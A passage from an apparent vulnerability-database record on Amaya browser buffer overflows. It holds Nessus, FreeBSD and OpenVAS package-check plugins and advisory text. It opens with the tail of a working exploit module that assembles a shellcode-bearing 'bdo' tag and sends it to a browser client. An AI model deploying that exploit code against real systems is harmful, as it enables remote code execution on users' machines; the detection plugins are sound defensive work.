\"\\x2d\\x18\\x69\\x45\\x7d\" # sub EAX, 7A7A0857\r\n\t\tsploit += \"\\x50\"\t\t # push EAX\r\n\t\tsploit += \"\\xc3\"\t\t # RETN\r\n\t\tsploit += make_nops(100)\r\n\t\tsploit += payload.encoded\r\n\t\tsploit += make_nops(970 - payload.encoded.length)\r\n\t\tsploit += \"\\\">pwned!</bdo>\"\r\n\r\n\t\tprint_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, sploit)\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16548/"}], "nessus": [{"lastseen": "2021-01-07T10:48:57", "description": "Secunia reports :\n\nA boundary error when processing 'div' HTML tags can be exploited to\ncause a stack-based buffer overflow via an overly long 'id' parameter.\n\nA boundary error exists when processing overly long links. This can be\nexploited to cause a stack-based buffer overflow by tricking the user\ninto e.g. editing a malicious link.\n\nA boundary error when processing e.g. a 'bdo' HTML tag having an\noverly long 'dir' attribute can be exploited to cause a stack-based\nbuffer overflow.\n\nA boundary error when processing 'input' HTML tags can be exploited to\ncause a stack-based buffer overflow via an overly long e.g. 'type'\nattribute.", "edition": 25, "published": "2011-10-14T00:00:00", "title": "FreeBSD : amaya -- multiple buffer overflow vulnerabilities (a89b76a7-f6bd-11dd-94d9-0030843d3802)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5282", "CVE-2009-0323"], "modified": "2011-10-14T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:amaya"], "id": "FREEBSD_PKG_A89B76A7F6BD11DD94D90030843D3802.NASL", "href": "https://www.tenable.com/plugins/nessus/56495", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2013 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56495);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-5282\", \"CVE-2009-0323\");\n script_xref(name:\"EDB-ID\", value:\"7467\");\n script_xref(name:\"Secunia\", value:\"32848\");\n\n script_name(english:\"FreeBSD : amaya -- multiple buffer overflow vulnerabilities (a89b76a7-f6bd-11dd-94d9-0030843d3802)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Secunia reports :\n\nA boundary error when processing 'div' HTML tags can be exploited to\ncause a stack-based buffer overflow via an overly long 'id' parameter.\n\nA boundary error exists when processing overly long links. This can be\nexploited to cause a stack-based buffer overflow by tricking the user\ninto e.g. editing a malicious link.\n\nA boundary error when processing e.g. a 'bdo' HTML tag having an\noverly long 'dir' attribute can be exploited to cause a stack-based\nbuffer overflow.\n\nA boundary error when processing 'input' HTML tags can be exploited to\ncause a stack-based buffer overflow via an overly long e.g. 'type'\nattribute.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.bmgsec.com.au/advisory/41/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.bmgsec.com.au/advisory/40/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.coresecurity.com/content/amaya-buffer-overflows\"\n );\n # http://www.freebsd.org/ports/portaudit/a89b76a7-f6bd-11dd-94d9-0030843d3802.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d32cc0dc\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Amaya Browser v11.0 \"bdo\" Tag Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:amaya\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"amaya>0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5282", "CVE-2009-0323"], "description": "\nSecunia reports:\n\nA boundary error when processing \"div\" HTML tags can be exploited\n\t to cause a stack-based buffer overflow via an overly long \"id\"\n\t parameter.\nA boundary error exists when processing overly long links. This can\n\t be exploited to cause a stack-based buffer overflow by tricking the\n\t user into e.g. editing a malicious link.\nA boundary error when processing e.g. a \"bdo\" HTML tag having an\n\t overly long \"dir\" attribute can be exploited to cause a stack-based\n\t buffer overflow.\nA boundary error when processing \"input\" HTML tags can be\n\t exploited to cause a stack-based buffer overflow via an overly long\n\t e.g. \"type\" attribute.\n\n", "edition": 4, "modified": "2008-11-25T00:00:00", "published": "2008-11-25T00:00:00", "id": "A89B76A7-F6BD-11DD-94D9-0030843D3802", "href": "https://vuxml.freebsd.org/freebsd/a89b76a7-f6bd-11dd-94d9-0030843d3802.html", "title": "amaya -- multiple buffer overflow vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-02T21:14:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-6005", "CVE-2008-5282", "CVE-2009-0323"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-12-21T00:00:00", "published": "2009-02-13T00:00:00", "id": "OPENVAS:63357", "href": "http://plugins.openvas.org/nasl.php?oid=63357", "type": "openvas", "title": "FreeBSD Ports: amaya", "sourceData": "#\n#VID a89b76a7-f6bd-11dd-94d9-0030843d3802\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID a89b76a7-f6bd-11dd-94d9-0030843d3802\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: amaya\n\nCVE-2008-5282\nMultiple stack-based buffer overflows in W3C Amaya Web Browser 10.0.1\nallow remote attackers to execute arbitrary code via (1) a link with a\nlong HREF attribute, and (2) a DIV tag with a long id attribute.\n\nCVE-2009-0323\nMultiple stack-based buffer overflows in W3C Amaya Web Browser 10.0\nand 11.0 allow remote attackers to execute arbitrary code via (1) a\nlong type parameter in an input tag, which is not properly handled by\nthe EndOfXmlAttributeValue function; (2) an 'HTML GI' in a start tag,\nwhich is not properly handled by the ProcessStartGI function; and\nunspecified vectors in (3) html2thot.c and (4) xml2thot.c, related to\nthe msgBuffer variable. NOTE: these are different vectors than\nCVE-2008-6005.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://secunia.com/advisories/32848/\nhttp://www.bmgsec.com.au/advisory/41/\nhttp://www.bmgsec.com.au/advisory/40/\nhttp://milw0rm.com/exploits/7467\nhttp://www.coresecurity.com/content/amaya-buffer-overflows\nhttp://www.vuxml.org/freebsd/a89b76a7-f6bd-11dd-94d9-0030843d3802.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(63357);\n script_version(\"$Revision: 4824 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-21 09:49:38 +0100 (Wed, 21 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-13 20:43:17 +0100 (Fri, 13 Feb 2009)\");\n script_cve_id(\"CVE-2008-5282\", \"CVE-2009-0323\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: amaya\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"amaya\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>0) {\n txt += 'Package amaya version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-6005", "CVE-2008-5282", "CVE-2009-0323"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2018-04-06T00:00:00", "published": "2009-02-13T00:00:00", "id": "OPENVAS:136141256231063357", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063357", "type": "openvas", "title": "FreeBSD Ports: amaya", "sourceData": "#\n#VID a89b76a7-f6bd-11dd-94d9-0030843d3802\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID a89b76a7-f6bd-11dd-94d9-0030843d3802\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: amaya\n\nCVE-2008-5282\nMultiple stack-based buffer overflows in W3C Amaya Web Browser 10.0.1\nallow remote attackers to execute arbitrary code via (1) a link with a\nlong HREF attribute, and (2) a DIV tag with a long id attribute.\n\nCVE-2009-0323\nMultiple stack-based buffer overflows in W3C Amaya Web Browser 10.0\nand 11.0 allow remote attackers to execute arbitrary code via (1) a\nlong type parameter in an input tag, which is not properly handled by\nthe EndOfXmlAttributeValue function; (2) an 'HTML GI' in a start tag,\nwhich is not properly handled by the ProcessStartGI function; and\nunspecified vectors in (3) html2thot.c and (4) xml2thot.c, related to\nthe msgBuffer variable. NOTE: these are different vectors than\nCVE-2008-6005.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://secunia.com/advisories/32848/\nhttp://www.bmgsec.com.au/advisory/41/\nhttp://www.bmgsec.com.au/advisory/40/\nhttp://milw0rm.com/exploits/7467\nhttp://www.coresecurity.com/content/amaya-buffer-overflows\nhttp://www.vuxml.org/freebsd/a89b76a7-f6bd-11dd-94d9-0030843d3802.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63357\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-13 20:43:17 +0100 (Fri, 13 Feb 2009)\");\n script_cve_id(\"CVE-2008-5282\", \"CVE-2009-0323\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: amaya\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"amaya\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>0) {\n txt += 'Package amaya version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
